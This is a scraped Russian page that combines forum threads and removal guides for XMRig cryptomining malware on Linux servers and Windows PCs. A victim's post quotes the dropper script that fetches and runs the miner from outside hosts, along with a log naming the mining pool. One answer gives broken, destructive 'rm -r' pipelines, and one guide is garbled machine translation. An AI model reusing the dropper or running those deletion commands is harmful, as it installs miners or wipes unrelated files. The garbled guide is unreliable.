Win64driver exe xmrig miner как удалить
Перейти к содержимому

Win64driver exe xmrig miner как удалить

  • автор:

как удалить вирус майнер xmrig?

Насколько я понял вы предлагаете убить процесс и все? Я уже убил его и удалил /tmp/xmrig. Вопрос в том, как узнать где исполнимые файлы этой заразы? Возможно ее код где-то остался. apt get uninstall xmrig вообще не находил ее изначально

29 июл 2018 в 19:31

Поместить на месте где жил вирус файл нулевой длинны, с таким же именем и дать ему атрибут, тут и тут потом разбираться кто его создает. Какое левое ПО у вас стоит? НодаЖс ? 🙂 и модули разных авторов?

29 июл 2018 в 19:59

nodejs нету, только vestacp exim fileban. Нету какого ни будь антивируса который это может удалить? Или предотвратить?

29 июл 2018 в 20:11
включать аудит и ждать повторного заражения. Кстати монтирование /tmp/ с noexec — хорошая идея
31 июл 2018 в 9:48

1 ответ 1

Сортировка: Сброс на вариант по умолчанию

Если хотите узнать кто читает или пишет в файл и потом удалить все по цепочке

~# lsof /path/to/file 

Если хотите убить все связанные процессы с патерном «xmring»

~# pkill -9 -f xmring 

Если хотите удалить бинарник и все активные файлы

~# ps aux | awk '/[x]mrig/ ' | xargs rm -r 

Можете попытаться найти скрипт инициализации и удалить его тоже

~# find / -type f -exec grep -l "xmrig" <> \; | xargs rm -r 

google: linux antivirus — вам в помощь в поиске антивируса для *nix

XMRig is a high performance Monero (XMR) CPU miner, with official support for Windows. Originally based on cpuminer-multi with heavy optimizations/rewrites and removing a lot of legacy code, since version 1.0.0 completely rewritten from scratch on C++.

xmrig удалить

Добрый день, имеется VPS в аренде на котором крутится битрикс вевб окружени, сегодня подключился и обнаружил загруженные на 100% процессоры. Процессор что грузит xmrig. Почитал что это вирус. 22 порт был изменен на не стандартный. Пароль root тоже сложный. Как его удалить что бы не переустанавливать систему?

kot488
17.12.21 11:57:48 MSK

Судя по гуглу, это не вирус, а майнер. Просто прибей процесс. А дальше смотри, будет ли он грузиться после ребута.

Zhbert ★★★★★
( 17.12.21 12:00:06 MSK )
Ответ на: комментарий от Zhbert 17.12.21 12:00:06 MSK

сейчас попробую, попробовал копии по ssh вытянуть, обрыв связи, через putty без проблем сижу. Подключил вени так копии сливаю

kot488
( 17.12.21 12:04:54 MSK ) автор топика

Какая аутентификация? Пароль или ключи?

chenbr0
( 17.12.21 12:07:06 MSK )
Ответ на: комментарий от chenbr0 17.12.21 12:07:06 MSK
kot488
( 17.12.21 12:10:58 MSK ) автор топика
Ответ на: комментарий от kot488 17.12.21 12:10:58 MSK

Ай-яй-яй. Впрочем, возможно, не пароль подобрали, а какую-то дыру попользовали, так что смена на ключи может не помочь.

Nervous ★★★★★
( 17.12.21 12:20:17 MSK )
Ответ на: комментарий от Nervous 17.12.21 12:20:17 MSK

Переустанавливать все с другим паролем?

kot488
( 17.12.21 12:22:20 MSK ) автор топика
Ответ на: комментарий от kot488 17.12.21 12:22:20 MSK

Я бы все перенакотил, обновил и сделал логин по ключам.

Nervous ★★★★★
( 17.12.21 12:23:30 MSK )
Ответ на: комментарий от Nervous 17.12.21 12:23:30 MSK

и не ставил битрикс

Anoxemian ★★★★★
( 17.12.21 12:31:08 MSK )
Ответ на: комментарий от Anoxemian 17.12.21 12:31:08 MSK

Чего? Вроде все с коробки хорошо настроено

kot488
( 17.12.21 12:32:04 MSK ) автор топика
Ответ на: комментарий от kot488 17.12.21 12:32:04 MSK

а еще нанял бы специалиста по деплою битрикса

Anoxemian ★★★★★
( 17.12.21 12:32:40 MSK )

killall -9 xmrig

ZenitharChampion ★★★★★
( 17.12.21 12:33:03 MSK )
Ответ на: комментарий от Nervous 17.12.21 12:23:30 MSK

Моё сообщение удалили почему-то по причине «флуд», а оно таковым не было. Я там написал что его всё равно опять взломают и что он может не париться. Объясню: если он сделает такую же установку как раньше — то и итог будет такой же.

Удалять «вирус» из рабочей системы это вообще верх глупости, система скомпрометирована и неизвестно что в ней ещё могли поменять.

Переустанавливать систему на другую точно такую же — лучше, но не спасёт, его взломают через ту же дыру что и в первый раз. И дело не в пароле/ключе (он же написал что пароль был сложный, а сложные пароли не подбираются).

Правильно — надо провести исследование, выяснить как именно был получен доступ и закрыть этот способ. Но он этого делать, очевидно, не будет. Поэтому остаётся только вариант забить.

firkax ★★★★★
( 17.12.21 12:34:31 MSK )
Ответ на: комментарий от firkax 17.12.21 12:34:31 MSK

копать когда был создан файлик который запустил процес?

kot488
( 17.12.21 12:38:07 MSK ) автор топика
Ответ на: комментарий от ZenitharChampion 17.12.21 12:33:03 MSK

убил процесс, сделал ребут, пока нет в запусках

kot488
( 17.12.21 12:41:15 MSK ) автор топика
Ответ на: комментарий от firkax 17.12.21 12:34:31 MSK

Ранее 3 года пока машина стояла за натом все было ок, сейчас шнур инета втыкнул на прямую, и словил

kot488
( 17.12.21 12:41:50 MSK ) автор топика
Ответ на: комментарий от firkax 17.12.21 12:34:31 MSK

Дырка где то в битрикс, от его имени запущен был процес

kot488
( 17.12.21 14:49:07 MSK ) автор топика
Ответ на: комментарий от kot488 17.12.21 14:49:07 MSK

За более чем 3 года битрикс хоть раз обновлялся?

zemidius
( 18.12.21 01:04:14 MSK )
Ответ на: комментарий от kot488 17.12.21 12:41:50 MSK

Значит нужно настроить nftables — оставить открытыми только необходимые порты, чтобы всякая гадость не лезла. Ну и плюс аутентификацию по ssh ключам, как советовал человек выше.

trickybestia
( 18.12.21 19:32:10 MSK )
Ответ на: комментарий от trickybestia 18.12.21 19:32:10 MSK

Отрык только 80 443 и измененный порт для ssh

kot488
( 20.12.21 12:37:37 MSK ) автор топика
Ответ на: комментарий от kot488 20.12.21 12:37:37 MSK

От целевой атаки (nmap) это не спасёт.

От глобального поиска уязвимых ресурсов скорее да, но не факт

IIIypuk ★★★
( 20.12.21 12:46:34 MSK )
Ответ на: комментарий от kot488 20.12.21 12:37:37 MSK

Значит, скорее всего, битрикс ваш хекнули. Чтобы избежать такого в будущем, можете попробовать настроить SELinux или хотя бы AppArmor.

trickybestia
( 20.12.21 12:49:04 MSK )
Ответ на: комментарий от IIIypuk 20.12.21 12:46:34 MSK

Ну, у ТСа же «сложный» ssh-пароль.

trickybestia
( 20.12.21 12:50:10 MSK )
27 января 2022 г.
Ответ на: комментарий от trickybestia 20.12.21 12:50:10 MSK

Вообщем по началу удаление скрипта помогало, на неделю, потом опять вредитель запускался. Пароли пробовал менять не помогае. В tmp были файлы xmrig и config.json. Ограничел доступа по ssh только с определенных IP.

Вот кусок лога который лога

  • ABOUT XMRig/6.16.2 gcc/9.3.0
  • LIBS libuv/1.42.0 OpenSSL/1.1.1l hwloc/2.5.0
  • HUGE PAGES supported
  • 1GB PAGES disabled
  • CPU Intel(R) Xeon(R) CPU E3-1225 v5 @ 3.30GHz (1) 64-bit AES L2:1.0 MB L3:8.0 MB 4C/4T NUMA:1
  • MEMORY 13.1/15.4 GB (85%)
  • DONATE 1%
  • ASSEMBLY auto:intel
  • POOL #1 193.29.56.190:443 algo auto
  • POOL #2 193.29.56.190:3333 algo auto
  • COMMANDS hashrate, pause, resume, results, connection [2022-01-22 20:10:41.043] config configuration saved to: «/tmp/config.json» [2022-01-22 20:10:41.149] net use pool 193.29.56.190:443 TLSv1.3 193.29.56.190 [2022-01-22 20:10:41.149] net fingerprint (SHA-256): «506847d9aff6c44cae3744081278ffee45cf4f372a86e490eb816209ecd52f19» [2022-01-22 20:10:41.149] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542932 (14 tx) [2022-01-22 20:10:41.149] cpu use argon2 implementation AVX2 [2022-01-22 20:10:41.167] msr cannot read MSR 0x000001a4 [2022-01-22 20:10:41.167] msr FAILED TO APPLY MSR MOD, HASHRATE WILL BE LOW [2022-01-22 20:10:41.167] randomx init dataset algo rx/0 (4 threads) seed bfeb43ae90807dc3… [2022-01-22 20:10:41.185] randomx allocated 2336 MB (2080+256) huge pages 11% 128/1168 +JIT (18 ms) [2022-01-22 20:10:46.004] randomx dataset ready (4820 ms) [2022-01-22 20:10:46.005] cpu use profile rx (4 threads) scratchpad 2048 KB [2022-01-22 20:10:46.007] cpu READY threads 4/4 (4) huge pages 100% 4/4 memory 8192 KB (2 ms) [2022-01-22 20:10:59.198] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542933 (18 tx) [2022-01-22 20:11:31.030] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542934 (12 tx) [2022-01-22 20:11:37.396] net new job from 193.29.56.190:443 diff 5289K algo rx/0 height 2542935 (4 tx) [2022-01-22 20:11:42.695] net new job from 193.29.56.190:443 diff 5289K algo rx/0 height 2542936 (4 tx) [2022-01-22 20:11:46.060] miner speed 10s/60s/15m 1479.1 n/a n/a H/s max 1491.6 H/s [2022-01-22 20:12:46.109] miner speed 10s/60s/15m 1463.9 1462.4 n/a H/s max 1491.6 H/s [2022-01-22 20:13:46.169] miner speed 10s/60s/15m 1491.8 1468.5 n/a H/s max 1491.8 H/s [2022-01-22 20:14:46.229] miner speed 10s/60s/15m 1479.5 1464.3 n/a H/s max 1491.8 H/s [2022-01-22 20:14:46.865] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542937 (18 tx) [2022-01-22 20:15:46.229] miner speed 10s/60s/15m 1463.6 1450.9 n/a H/s max 1491.8 H/s [2022-01-22 20:16:46.289] miner speed 10s/60s/15m 1460.0 1472.3 n/a H/s max 1491.8 H/s

А вот пошоже нашел запуск файла #!/bin/bash if [ -f /tmp/xmrig -a -f /tmp/config.json ]; then

 echo "xmrig&config.json status yes" else cd /tmp wget -P /tmp [url]https://github.com/xmrig/xmrig/releases/download/v6.16.2/xmrig-6.16.2-linux-static-x64.tar.gz[/url] curl -o /tmp/config.json [url]https://cdn.sql.gg/TiWRtJXktxmJnpUYVIeCfd7ukmSHkKTc/config.json[/url] tar -zxvf /tmp/xmrig-6.16.2-linux-static-x64.tar.gz mv /tmp/xmrig-6.16.2/xmrig /tmp/xmrig chmod 777 /tmp/xmrig rm -rf /tmp/xmrig-6.16.2 rm -rf /tmp/xmrig-6.16.2-linux-static-x64.tar.gz echo "xmrig&config.json status no loading" 

ps -fe|grep ./xmrig |grep -v grep if [ $? -ne 0 ] then echo «start process…..» cd /tmp ./xmrig else echo «runing…..» fi

Пока в хосте прописал левый IP для github.com и cdn.sql.gg и снес файлы которыми запускался процесс

В cron запускали задачи по дампу БД от пользователя bitrix. Но что интересно, пользователю пасс менял а залогинеться под ним не могу, но не смотрел возможно у него доступ по ssh закрыт. Эти файлы видел но не предал значение, думал это как раз бакап битрикса

kot488
( 27.01.22 08:42:41 MSK ) автор топика
Последнее исправление: kot488 27.01.22 08:45:58 MSK (всего исправлений: 1)

Ответ на: комментарий от kot488 27.01.22 08:42:41 MSK

ты не понимаешь элементарного
если твою тачку порутали, то могут запросто менять дату создания файла (man touch), владельца файла (man chown), создавать невидимые файлы (не те, которые с точечкой, а те, которые драйвер ФС не видит), скрывать своё присутствие в /etc/passwd и тд и тп
проще говоря, удаляя файлы из /tmp, ты просто отрубаешь голову змей горынычу, а потом на её месте вырастает новых две

anonymous
( 27.01.22 17:35:38 MSK )
Ответ на: комментарий от anonymous 27.01.22 17:35:38 MSK

Так я нашел откуда что запускалось. И удалил. пока полет нормальный

Удаление XMRig CPU miner

Предоставить:

Что такое XMRig CPU miner?

UK and US government websites among the 4,200 injected with Monero mining malware

XMRig CPU miner это троян, который использует мощность процессора жертв мин cryptocurrency. Он может использоваться для разминирования Bitcoin, Monero и кучу других цифровых валют. Это не так просто узнать о его вход, потому что он работает в фоновом режиме и всегда входит компьютеры пользователей без их ведома.

Есть только два основных симптомов, которые указывают его успешного входа. Во-первых вы можете найти процесс, связанный с XMRig CPU miner в диспетчере задач. Кроме того ваш компьютер может начать работу в нежелательным образом. Конкретно говоря, она может стать очень медленным. В некоторых случаях пользователи, которые имеют вредоносного программного обеспечения, установленных на их компьютерах могут начать получать уведомления, говорят, что XMRig CPU miner является активным в системе. Если выясняется, что Троянская установлен и работать на вашем компьютере, убедитесь, что вы удалить XMRig CPU miner из вашей системы как можно скорее. Он не будет удалять себя, мы можем заверить вас, то есть он никогда не будет останавливать работать на вашем компьютере, если вы не удалить его самостоятельно.

Как работает XMRig CPU miner?

Все cryptocurrency шахтеры работают аналогичным образом. То есть они используют мощности процессора жертв мин цифровой валюты. Разумеется пользователи не знают ничего о том, что до тех пор, пока они замечают, что их компьютеры стали вяло. Это не только симптом, показывающ что XMRig CPU miner является активным в системе. Если она когда-нибудь успешно входит в ваш компьютер, вы больше не сможете использовать некоторые приложения. Кроме того ваш компьютер аварии и заморозить все чаще. Если вы уверены, что ваш компьютер начал действовать странно из-за входа Шахтер, XMRig CPU miner необходимо удалить как можно скорее. Не ожидать, что она оставить вашей самой системы, потому что это не произойдет.

Откуда берется XMRig CPU miner?

Это трудно сказать, как XMRig CPU miner вступил вашей системы, но наиболее вероятный сценарий является, что он незаконно вошел компьютер. Например он мог бы был установлен рядом с другими приложениями. Конечно есть люди которые скачать добыча троянцы сами из Интернета. Без сомнения они не знают, что они скачать вредоносных программ. Независимо от того, как XMRig CPU miner вступил вашей системы вы должны удалить XMRig CPU miner сегодня, если вы хотите иметь возможность использовать ваш компьютер нормально снова.

Как удалить XMRig CPU miner?

Существует два способа для удаления XMRig CPU miner. Во-первых вы можете найти все его компоненты себя и стереть их по одному вручную. Во-вторых вы можете реализовать автоматическое XMRig CPU miner удаления. Последний является более простой метод если по сравнению с ручного удаления, так что если вы не очень опытный, или не удается найти один вредоносных компонент на вашем компьютере, вам следует использовать сканер анти-вредоносных программ для очистки компьютера. Убедитесь, что вы используете надежный инструмент, потому что есть так много плохих приложений только притворяется быть хорошим сканеры, там. Такой инструмент не может выполнять удаление XMRig CPU miner для вас.

Offers

Скачать утилиту to scan for XMRig CPU miner Use our recommended removal tool to scan for XMRig CPU miner. Trial version of provides detection of computer threats like XMRig CPU miner and assists in its removal for FREE. You can delete detected registry entries, files and processes yourself or purchase a full version.

More information about SpyWarrior and Uninstall Instructions. Please review SpyWarrior EULA and Privacy Policy. SpyWarrior scanner is free. If it detects a malware, purchase its full version to remove it.

Quick Menu
  • шаг 1. Удалите XMRig CPU miner, используя безопасный режим с поддержкой сети.
    • Удалить XMRig CPU miner из Windows 7/Windows Vista/Windows XP
    • Удалить XMRig CPU miner из Windows 8/Windows 10
    • Удалить XMRig CPU miner из Windows 7/Windows Vista/Windows XP
    • Удалить XMRig CPU miner из Windows 8/Windows 10
    шаг 1. Удалите XMRig CPU miner, используя безопасный режим с поддержкой сети.
    • Windows 8/8.1/10
    • Windows XP/7/Vista
    Удалить XMRig CPU miner из Windows 7/Windows Vista/Windows XP
    1. Нажмите кнопку Пуск и выберите пункт Завершение работы.
    2. Выберите Перезагрузка и нажмите кнопку ОК. Windows 7 - restart
    3. Начните, нажав F8, когда ваш компьютер начинает загрузку.
    4. В разделе Дополнительные варианты загрузки выберите безопасный режим с поддержкой сети. Remove XMRig CPU miner - boot options
    5. Откройте браузер и скачать anti-malware утилита.
    6. Используйте утилиту для удаления XMRig CPU miner
    Удалить XMRig CPU miner из Windows 8/Windows 10
    1. На экране входа в систему Windows нажмите кнопку питания.
    2. Нажмите и удерживайте клавишу Shift и выберите Перезапустить. Windows 10 - restart
    3. Перейти к Troubleshoot → Advanced options → Start Settings.
    4. Выберите Включить безопасный режим или безопасный режим с поддержкой сети в разделе Параметры запуска. Win 10 Boot Options
    5. Нажмите кнопку Перезагрузка.
    6. Откройте веб-браузер и загрузите средство для удаления вредоносных программ.
    7. Используйте программное обеспечение для удаления XMRig CPU miner
    шаг 2. Восстановление файлов с помощью восстановления системы
    • Windows 8/8.1/10
    • Windows XP/7/Vista
    Удалить XMRig CPU miner из Windows 7/Windows Vista/Windows XP
    1. Нажмите кнопку Пуск и выберите Завершение работы.
    2. Выберите Перезагрузка и OK Windows 7 - restart
    3. Когда ваш компьютер начинает загрузку, нажмите клавишу F8 несколько раз, чтобы открыть дополнительные параметры загрузки
    4. Выберите команду из списка. Windows boot menu - command prompt
    5. Введите cd restore и нажмите Enter. Uninstall XMRig CPU miner - command prompt restore
    6. Введите rstrui.exe и нажмите клавишу Enter. Delete XMRig CPU miner - command prompt restore execute
    7. В новом окне нажмите Далее и выберите точку восстановления до инфекции. XMRig CPU miner - restore point
    8. Снова нажмите кнопку Далее и нажмите кнопку Да, чтобы начать восстановление системы. XMRig CPU miner removal - restore message
    Удалить XMRig CPU miner из Windows 8/Windows 10
    1. Нажмите кнопку питания на экран входа Windows.
    2. Нажмите и удерживайте клавишу Shift и нажмите кнопку Перезапустить. Windows 10 - restart
    3. Выберите Устранение неисправностей и перейдите дополнительные параметры.
    4. Выберите Командная строка и выберите команду Перезапустить. Win 10 command prompt
    5. В командной строке введите cd restore и нажмите Enter. Uninstall XMRig CPU miner - command prompt restore
    6. Введите rstrui.exe и нажмите Enter еще раз. Delete XMRig CPU miner - command prompt restore execute
    7. Нажмите кнопку Далее в окне Восстановление системы. Get rid of XMRig CPU miner - restore init
    8. Выберите точку восстановления до инфекции. XMRig CPU miner - restore point
    9. Нажмите кнопку Далее, а затем нажмите кнопку Да, чтобы восстановить систему. XMRig CPU miner removal - restore message
    Incoming search terms:
    • rfr elfkbnm XMRig CPU miner
    • xmrig miner как удалить
    • процессор занят XMRing miner

    One thought on “ Удаление XMRig CPU miner ”

    1. Ватник Июнь 18, 2018 на 12:40 пп Как жи всё сложна

    Как удалить XMRig CPU miner

    Удаление XMRig CPU miner

    Криптовалютный бум 2017 года привёл не только к существенному подорожанию видеокарт и основанию многих криптоферм и бирж. Негативное влияние на широкие массы пользователей выразилось в том, что на них, а конкретно, на вычислительных мощностях их ПК без ведома самих юзеров решили зарабатывать хакеры и создатели вредоносного программного обеспечения. В рамках данной статьи мы рассмотрим, как бороться с одним из популярных вирусных майнеров.

    Удаляем XMRig CPU miner

    Изначально сама программа XMRig CPU miner была и остаётся вполне добросовестным майнером, с помощью которого пользователи добывают валюту Monero, однако существует и одноимённый майнинговый вирус, использующий мощность процессора компьютера неосторожного пользователя для скрытой добычи криптовалюты сторонними лицами. Разобраться с ним можно двумя основными способами, которые доступны для комбинирования.

    Способ 1: Автоматическое удаление

    Майнинговые вирусы – очень скрытные и живучие, поэтому не факт, что даже установленный у вас антивирус сможет вовремя среагировать на заражённый файл, пока тот не укоренился в доверенных системных процессах Windows и реестре. Кроме того, часто обычного удаления не хватает, потому как вирус переписывает стандартное поведение ОС. Вследствие этого, при очередной проверке системных файлов, не найдя нужных элементов, ПК попытается их восстановить из-за того, что майнер создал такую инструкцию в реестре, позаботившись о своём выживании и возвращении при попытке от него избавиться.

    Для того чтобы удалить вирус и возможности его «реинкарнации», воспользуйтесь программами-сканерами, которые можно использовать параллельно с вашим антивирусным софтом, потом найдите проблемы реестра и, если какие-либо установки будут ссылаться на удалённые майнинговые файлы, исправьте их. Поиск и удаление вирусов с помощью Kaspersky Virus Removal Tool производится так:

    1. После открытия исполняемого файла примите условия «Лицензионного соглашения», а также «Политики конфиденциальности», кликнув по соответствующим галочкам, иначе сканер не запустится, после чего нажмите на кнопку «Принять». Начало работы с Kaspersky Virus Removal Tool
    2. Дождитесь инициализации приложения. Прогресс инициализации Kaspersky Virus Removal Tool
    3. Нажмите на «Изменить параметры» для того, чтобы расширить область поиска вредоносного ПО. Окно запуска проверки Kaspersky Virus Removal Tool
    4. Выберите все возможные объекты для проверки и нажмите «ОК». Выбор объектов для проверки Kaspersky Virus Removal Tool
    5. Щёлкните левой кнопкой мыши по «Начать проверку». Запуск проверки Kaspersky Virus Removal Tool
    6. Подождите, пока утилита выполнит проверку. Ожидание окончания проверки Kaspersky Virus Removal Tool

    Kaspersky Virus Removal Tool – крайне дотошный сканер, особенно в случаях, когда нужно проверить все элементы системы, поэтому диагностика может занять около десяти минут и даже больше.

  • Когда все угрозы будут найдены кликните по области выбора действия с ними и выберите «Удалить», после чего нажмите «Продолжить». Обнаруженные угрожающие объекты в Kaspersky Virus Removal Tool
  • Подождите, пока производится лечение. Ожидание обезвреживания угроз в Kaspersky Virus Removal Tool
  • Оцените результаты проверки и нейтрализации угроз, после чего завершите работу с программой, щёлкнув по «Закрыть». Нейтрализация обнаруженных объектов и завершение работы с Kaspersky Virus Removal Tool
  • Лечащая утилита Kaspersky Virus Removal Tool прекрасно справляется с удалением майнинговых вирусов, и XMRig CPU miner — не исключение, единственным неудобством может стать то, что если заражённому файлу удастся хорошо спрятаться, в таком случае на его поиск уйдёт несколько десятков минут вашего времени.

    Эффективно использовать лечащую утилиту в комбинации с оптимизатором для того, чтобы очистить реестр ОС от остатков вредоносного ПО и гарантировать невозвращение вируса. Мы рекомендуем вам воспользоваться CCleaner и произвести такие действия:

    Скачать CCleaner

    1. Выберите раздел «Реестр». Начало работы и выбор раздела Реестр в CCleaner
    2. Пометьте все возможные варианты неполадок галочками и нажмите «Поиск проблем». Настройки поиска и обнаружение проблем реестра в CCleaner
    3. Подождите, пока приложение ищет сбои. Ожидание окончания проверки в CCleaner
    4. Выделите все найденные проблемы реестра и нажмите «Исправить выбранное». Найденные проблемы реестра в CCleaner
    5. Нажмите на «Исправить отмеченные», чтобы сразу разобраться со всем найденным. Исправление отмеченных проблем реестра в в CCleaner
    6. Завершите работу с программой, кликнув по «Закрыть». Успех и завершение работы с CCleaner

    Хоть это и не обязательно, но мы настоятельно рекомендуем перезагрузить компьютер, чтобы изменения системы вступили в полную силу.

    Использование лечащей утилиты и оптимизатора является эффективной мерой против всего вредоносного программного обеспечения и майнинговых вирусов в частности. Таким образом, вы очищаете систему и не оставляете возможности зловредному ПО переустановиться.

    Способ 2: Ручное удаление

    Отсутствие возможности или нежелание по какой-либо причине использовать специализированный софт для поиска и вредоносного программного обеспечения и починки реестра не станет преградой для удаления вируса, хотя будет несколько сложнее. Производить всю процедуру в ручном режиме необходимо в 3 последовательных этапа, о которых и пойдет речь далее на примере Windows 10.

    Шаг 1: Удаление программы

    1. Найдите через меню «Пуск» приложение «Установка и удаление программ» и откройте его. Нахождение и запуск меню Установка и удаления программ в Windows
    2. В строке поиска найдите приложение, которое вы подозреваете во вредоносности, или отсортируйте их все по категории «Дата установки», чтобы найти недавно установленные, если вы не уверены в том, какая именно программа грузит систему. После определения приложения удалите его, нажав на кнопку «Удалить». Удаление программ в Windows

    Такой способ удаления хоть не отличается оригинальностью, однако может сработать, если причиной заражения стала установка стороннего приложения. При этом вредоносное ПО может замаскироваться, и тогда придётся пойти на некоторые ухищрения, чтобы его удалить, о чём подробно рассказано в нижеприведённых статьях.

    Шаг 2: Отключение автозагрузки

    Когда «тело» загружающей программы удалено, осталось ликвидировать возможности восстановления, для этого необходимо очистить его параметры автозагрузки, если таковые еще имеются (а с вирусами такое часто бывает). Выполните следующие действия:

    1. Нажмите комбинацию клавиш «Ctrl+Alt+Delete» и кликните по «Диспетчер задач». Открытие Диспетчера задач в Windows
    2. Перейдите на вкладку «Автозагрузка», выберите процесс, который вызывает у вас сомнения, кликните по нему правой кнопкой мыши и нажмите «Отключить». Настройка автозагрузки в Диспетчере задач Windows 10

    Отключив опасному ПО возможность автозагрузки, вы предотвратите его возвращение на ПК и восстановление вредоносной функциональности.

    Вероятно, что у вас не будет никакого схожего процесса после удаления программы и это действие можно пропустить. Но если одноимённый с вирусом процесс всё же присутствует, воспользуйтесь пунктом «Открыть расположение файла», кликнув по нему ПКМ, и вручную зачистить остатки подозрительного приложения.

    Шаг 3: Очистка реестра

    Когда само ПО и инструкции по его автозагрузке удалены, следующим шагом станет очистка реестра от вредоносных элементов.

    1. Отыщите с помощью поиска меню «Пуск» приложение «Редактор реестра» и произведите «Запуск от имени администратора», чтобы система точно не запретила вам вносить изменения в реестр. Поиск и открытие Редактора реестра в Windows
    2. Кликните по «Правка», а после нажмите на «Найти…», но также можно воспользоваться комбинацией клавиш «Ctrl+F». Начало работы с Редактором реестра в Windows 10
    3. Введите в строку поиска xmrig , проставьте все галочки под строкой «Просматривать при поиске», для максимального охвата и нажмите «Найти далее». Поиск нужной записи в Редакторе реестра Windows
    4. Подождите, пока система не просмотрит реестр. Процесс поиска в Редакторе реестра Windows
    5. Кликните по найденной записи реестра правой кнопкой мыши и выберите в контекстном меню пункт «Удалить». Удаление вредоносного элемента реестра в Редакторе реестра Windows
    6. Подтвердите удаление элемента реестра, нажав «Да». Подтверждение удаления записи в Редакторе реестра Windows

    Отныне от влияния вируса свободен и реестр, а риск встретить его вновь из-за автоматического восстановления ликвидирован.

    Последним аккордом в чистке ОС станет восстановление повреждённых файлов, ведь если вирус мимикрировал под полезный софт и взаимодействовал с системой длительное время, то велика вероятность, что он своей деятельностью нанёс некоторый урон компонентам Windows. Этот ущерб можно определить и восполнить, произведя следующие действия:

    1. Найдите и откройте приложение «Командная строка» в поиске меню «Пуск», инициируйте «Запуск от имени администратора», чтобы строка восприняла нужную команду, чего может не случиться в обычном режиме. Поиск и открытие Командой строки в Windows
    2. Введите команду sfc /scannow , это приведёт к началу сканирования системы и автоматического исправления повреждённых файлов, что может занять приличное количество времени. Ввод команды на поиск и восстановление повреждённых файлов в Командой строке Windows
    3. Подождите, пока ПК проверяет систему, не ожидайте быстрого прекращения процесса. Начало сканирования системы и ожидание завершения проверки файлов в Командой строке Windows
    4. Просмотрите результат сканирования и восстановления файлов. Успешное завершение поиска и восстановления файлов в Командой строке Windows

    Постарайтесь не щёлкать левой кнопкой мыши по интерфейсу «Командной строки» во время проверки или восстановления файлов. Это может привести к подвисанию и приостановке выполняемой команды. При подозрении приложения в зависании, нажмите на кнопку «Enter», для того чтобы проверить статус исполняемого процесса.

    Таким образом, вы устранили последствия пребывания майнингового вируса на вашем компьютере. Остаётся перезагрузить ПК и довольствоваться проделанной вручную работой. И не стоит забывать, что описанные выше методы можно комбинировать, сначала выполнив автоматическую проверку, а после самостоятельно избавиться от следов. В таком случае вы можете быть полностью уверены, что вредоносное программное обеспечение исчезло с вашего компьютера.

    По ходу статьи было изложено два комплексных способа того, как удалить XMRig CPU miner с вашего компьютера. Если у вас есть возможности для скачивания и использования стороннего софта – вам помогут Kaspersky Virus Removal Tool или Dr.Web CureIt!, а также CCleaner. В ином случае вы можете вручную осуществить удаление вируса и восстановление системы.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *